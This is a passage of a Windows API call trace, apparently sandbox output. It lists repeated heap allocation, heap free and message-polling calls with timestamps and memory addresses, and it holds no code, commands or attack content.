lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0119.929] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0119.930] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0119.930] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0119.930] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0119.931] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0119.931] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0119.931] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0119.931] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0119.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.932] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0119.932] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.932] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0119.932] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0119.933] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0119.933] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458fd8 [0119.933] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458fd8 | out: hHeap=0x12c0000) returned 1 [0119.933] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.933] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.934] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0119.934] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0119.934] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0119.934] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0119.934] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.935] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.936] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.936] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0119.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0119.938] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0119.938] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.939] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0119.939] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.939] RtlAllocateHeap 